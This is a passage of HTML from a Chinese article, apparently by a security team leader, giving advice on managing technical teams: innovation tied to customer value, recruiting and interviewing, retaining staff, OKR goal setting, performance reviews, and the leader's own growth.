0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="box-sizing: content-box !important;">金庸《倚天屠龙记》描写了一个有趣的场景，张三丰闭关结束，展示新创的太极拳，结果大家面面相觑，无人喝彩。这个是真正的创新吧。</span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="box-sizing: content-box !important;"><span style="font-family: -apple-system;color: rgb(227, 108, 9);font-style: italic;box-sizing: content-box !important;">1. </span><span style="color: rgb(63, 63, 63);box-sizing: content-box !important;">最近我和一位朋友聊到“创新”这个话题。他说，</span><span style="color: rgb(63, 63, 63);font-weight: bold;box-sizing: content-box !important;">奖励创新、欢呼创新，这些招对创新都没啥用。</span><span style="color: rgb(63, 63, 63);box-sizing: content-box !important;">这是创新的本质决定的。</span></span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="box-sizing: content-box !important;"><span style="font-family: mp-quote;color: rgb(227, 108, 9);font-style: italic;box-sizing: content-box !important;">2. </span><span style="color: rgb(63, 63, 63);box-sizing: content-box !important;">创新的难度，不在于搞出一个新点子，而是突破原来的认知惯性。你想象一个场景：有个人开了一个发布会，公布了一个新产品，坐在台下的人惊呼，这产品太妙了，我要买。</span></span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="box-sizing: content-box !important;"><span style="font-family: mp-quote;color: rgb(227, 108, 9);font-style: italic;box-sizing: content-box !important;">3. </span><span style="color: rgb(63, 63, 63);box-sizing: content-box !important;">那你放心，这充其量也就是一个改进式创新。为啥？因为它是大家已经知道自己需要的，是一个对原来东西的优化。而真正巨大的创新，要全面突破原来的认知惯性，那怎么会有欢呼呢？只会有嘲笑和质疑。</span></span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="box-sizing: content-box !important;"><span style="font-family: mp-quote;color: rgb(227, 108, 9);font-style: italic;box-sizing: content-box !important;">4. </span><span style="color: rgb(63, 63, 63);box-sizing: content-box !important;">所以，流行的创新理论，什么针对痛点，什么用户体验，其实都不太成立。你就想，第一台蒸汽机车出现的时候，跑得也不快，毛病还一大堆，哪能解决什么痛点？又谈得上什么体验？所以你看，</span><span style="color: rgb(227, 108, 9);font-weight: bold;box-sizing: content-box !important;">真正的创新最大的特点，可能就是我们不认识它，而且不会为它欢呼。</span></span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 15px;"><em><span style="text-indent: 210pt;box-sizing: content-box !important;"> —— 罗胖60秒：为什么我们不为创新欢呼？</span></em></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-weight: bold;text-indent: 0pt;">从客户价值谈技术创新</span><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.技术创新要跳出技术本身思考</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   把组织业务的发展需要纳入到自己的思考维度中，而且要放在非常重要的地位。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   在此之上再去思考如何用最合适的技术方案解决可能遇到的问题。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.技术创新要围绕客户价值</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   企业的核心是围绕客户价值实现的</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   客户不一定是市场的客户，内部很多团队其实也是彼此的客户。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   技术团队如何更好地关注客户价值：</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">      组织文化（追求技术卓越的同时要将技术对业务和战略产生 Impact 作为重要衡量指标，避免过度设计和炫技）、</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">      研发流程（构建可快速交付客户价值的能力）、</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">      产品功能（要鼓励技术能够经常接触用户，不仅仅是来自产品和运营的“二手”需求，而让他们真正有机会去接触客户，激发灵感和创意）  </span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.技术创新不能憋大招</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   技术价值的释放曲线是一个 S 型，一开始呈现出的价值会比较低</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   要先把技术的最小 MVP 快速地做出来，并且找一些应用场景，快速地根据反馈进行迭代。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;font-weight: bold;">趋势类</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   云的兴起，对攻防的需求，业务孵化，例如云安全服务、接口安全；</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   IOT兴起，固件分析…</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   元宇宙…</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="546" data-backw="578" data-galleryid="" data-ratio="0.9441747572815534" data-s="300,640" data-type="png" data-w="824" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=314b2583&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhcib2yyQVDcA2lRDANB2s38nBzplSTHfF2CVNa4JDU2zDUvH6KNQEpxg%2F640%3Fwx_fmt%3Dpng"/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">2 招人留人</span></strong></span><br/></h1><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">企业和团队的核心资产就是人才，招人工作不只是HR的工作（尤其技术大佬），也是每个技术Leader该重点关注的环节。这背后依托的是Leader个人品牌以及行业影响力。虽然招聘渠道有很多种，但信息安全行业，相对来讲 推荐的更靠谱。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">2.1 关于招聘</span></strong></span><br/></h2><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.仔细分析组织目标，业务需求，相对精准的招聘描述JD</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.特定圈内渠道（知名公众号、论坛）、人员（大佬相互举荐）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.培养HR，关联业务，融入行业（精准猎取），猎头属性</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.日常行业关系的培养（人脉圈子）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.团队品牌品牌建设及运营（酒香也怕巷子深，多吆喝着）</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">2.2 关于面试</span></strong></span><br/></h2><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.设立评价标准（技术实力、软技能、技术热情、正能量、团队目标认同）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.关注求职者的擅长点，切勿“用己之长攻他之短”，长板与团队的互补</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.多关注潜力（元认知），内功方向。一些技巧类是通过快速学习修成的</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.重点关注学习能力（自主学习、快速学习），学习的本质不是单纯学会知识，而是学会学习。这也是高学历的重要竞争力。毕竟IT类知识技能很容易“过时”。</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.关注能岗匹配，不是每个岗位都是大佬。需要清晰的定位</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">6.软技能同样非常重要（个性、动机、价值观、喜欢挑战）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><img class="rich_pages wxw-img" data-backh="301" data-backw="553" data-ratio="0.5443037974683544" data-type="png" data-w="553" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e0e98af7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFh68YpibdYcZdQoxGKuj2ia9frKRHtNrTd4x9f0cq9X7TvuoGFkd8icw0jA%2F640%3Fwx_fmt%3Dpng"/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="margin-top: 13pt;margin-bottom: 13pt;text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">2.3 关于留人</span></strong></span><br/></h2><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.个人发展规划同企业组织目标一定得找一个结合点</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)我习惯让每个人新入职的同事写个人的规划书，半年度和年度再去Review</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)个人发展的规划，一般会融入兴趣（强调自驱动）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.导师计划</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)收集诉求、需求、问题（技术问题、生活问题、工作问题）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)归类问题，解决问题，并汇编成册（为下一个提供支持）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)技术成长路线（技术目标，沟通对齐路径上的关键成果里程碑）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.文化导向</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)企业文化、团队文化的主线，工程师文化（有追求、技术热爱）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)正能量，强调自驱动、自律。</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.成就导向</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)完成的工作目标觉得很有意义，且长期复利</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.其他</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)目标类，参考目标设立&amp;绩效结果，第三章</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)激励类，参考高效团队的激励管理，第一章</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">3 目标管理</span></strong></span><br/></h1><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">3.1 目标设立</span></strong></h2><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.团队之所以为团队，是因为这些人有共同的目标</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.了解公司战略、组织目标、团队目标，去细化分析到每个人的目标（设立）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.目标设立前，思考差异化优势以及完成后可能的结果，（考虑到可能存在求其上者得其中的效应）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.目标设立中，包含几个档位：及格线、拔高线、优秀线，与每个人充分沟通对齐，让队友确认目标的背后意义以及过程路径（不是一蹴而就）</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.OKR（包括KPI、KRA），定方向 O（Objective），定数字目标 KR（Key Result）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)普通人绩效关注KR 量化</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)高品质、高输出专家，重点围绕大“O”来，看实际成果价值和变化，而非量化结果的“完成率”，KR仅用来检视举措有效性，不作为评价依据。对大方向大O的贡献。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="477" data-backw="578" data-galleryid="" data-ratio="0.8249594813614263" data-s="300,640" data-type="png" data-w="1234" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=7e6ba68a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhFiaMh9d6xrOibryCmx2koPOBDpdsV2yOxGCv7kmfUFxUIk9PTWNv17Kw%2F640%3Fwx_fmt%3Dpng"/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: &#34;等线 Light&#34;;">3.2 绩效结果</span></strong></span><br/></h2><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.提前团队内部同步，绩效评价标准。例如</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)对团队、公司的贡献</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)技术实力、团队赋能、技术创新</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)文化价值观&amp;工作态度</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;margin-left: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">PS：避免有能力无贡献，同样避免有强能力但高度不够；对技术的追求</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.绩效结果如果存在末尾淘汰，即使有标准，肯定也会有人不满意，比较难沟通</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">a)无论是绩效结果如何，首先还是要肯定做的好的地方（切勿一斧子砍死，啥都不是，那沟通就结束了，芭比Q了）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">b)针对做的不太好的地方，参考BIC模型，B事实、I影响、C后果</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">c)通过做的不好的案例，引导队员自己说出优化方案，Leader辅助给建议。（绩效沟通的核心目的就是表扬鼓励做的好的、引导优化改善做的不好的）</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">d)一般不建议绩效和奖金一起沟通，因为大家会过度关注奖金，而放弃最该关注的为什么是这个绩效。所以尽量分开沟通。</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.团队沟通绩效结束后，总结所有人表现好的案例，去表扬和激励。对不提倡的行为也统一宣贯说明。</span></p><p style="margin-left: 18pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.根据绩效结果，关联奖金分配。（贡献与回报，多劳多得）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">4 自我管理</span></strong></span><br/></h1><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">4.1 管人管事</span></strong></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">管人就是管团队，除了要招聘到很好很强的人才，组建一个很强的团队，并不断提高团队的实力之外，还需要做的是激发团队的热情，培养他们的主人翁精神，这样才能够更高效地开发日益复杂的软件产品、解决日益困难的技术问题。因此，管理者需要在各个方面都坚持比较高的标准，并不断的提高团队的能力标准</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">管事就是找准方向，如果你的方向是错的，即使你有一个好的团队，也是没法高效起来的。一将无能累死三军。另外，找到正确的方向之后，还要落地执行，而在执行过程中，会有各种各样的问题需要你去解决，包括对第三方的依赖、条件受限（时间不够、人力不足）、以及各种没有考虑到的项目风险。有时，一个小问题就可能会影响到整个项目的进度。所以，如何把复杂的逻辑简化掉（简化而不是简陋），如何把复杂的问题拆解成小问题并各个击破，如何在受限的条件下抓重点，如何说服别人统一大家的目标……这些都是管理者需要负责的。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">自我管理的意思是说管理者自身的素质和自我的成长，通常来说，管理者就是这个团队的天花板，如果管理者自己不成长，那么团队就会受限，所以，管理者要修炼自己硬技能和软技能等各方面的能力，包括个人魅力、沟通能力等，从而提高自己的影响力。所谓影响力并不在于职位高低，而是当别人有困难的时候，是否会想到向你寻求建议或支持。一个 leader 的关键素养就是要能服众，能获得团队和客户的信任，之后，自然会赢得老板的信任。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   后来发现，管理的本质根本不是这两个方面（管人、管事），管理的本质是管结果。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-family: &#34;等线 Light&#34;;">4.2 自我提升</span></strong></span><span style="font-size: 17px;font-family: &#34;等线 Light&#34;;"></span><br/></h2><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.多向外看</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">需要经常了解外面发生了什么，了解前沿的技术发展，通过外部力量来影响团队。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">紧跟时代的特点，了解新的资讯、新的变化，95 后、00 后（给他赋予一个意义是至关重要的）都慢慢步入社会，管理方式也在变化，自己也需要做出调整。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.学习管理艺术</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">及时学习补充管理理论，必须牢记管理也是一门学问（很多技术出身的管理者常常认为技术人员是不需要管理的，特别是自己比较自律的那种），而技术人员往往容易做违反管理原则的事情，比如：事必躬亲，过分自信，通过自己努力虽然能解决部分问题，但是效果通常不好，长期如此团队成员没有发挥锻炼的机会，这样的管理者是培养不出人才，打造不出好的技术团队。最后自己累死了，也没把事情做好，更难把业务做大，最后还想不明白为什么？我们要牢记“专业的事情由专业的人去做”。要学习熟悉管理理论中的一些常识，比如 2/8 原则、PDCA 戴敏环、墨菲定律等等。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.主抓团队成果</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">作为技术出身的管理者，还要学会从“自己做事”中跳出来改变为“指导团队做事”、以及“引导团队做事”。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.多思考问题，多角度想问题，把问题想透彻，方法论比解决单个问题更有价值。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">作为领导者，与其说是管理团队，不如说是管理自己。这里有两种能力非常重要：第一是认知能力，对于事情的判断要有自己的原则标准，以此来指导自己的工作，建议可以看一下《原则》这本书。第二是知行合一（就是心学大师王阳明倡导的），领导者是孤独的，不被理解将会是常态，你不得不向自己内心寻求答案，那里将是一个更为广阔的精神世界。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.提升脑力、体力、心力</span></p><hr style="border-style: solid;border-width: 1px 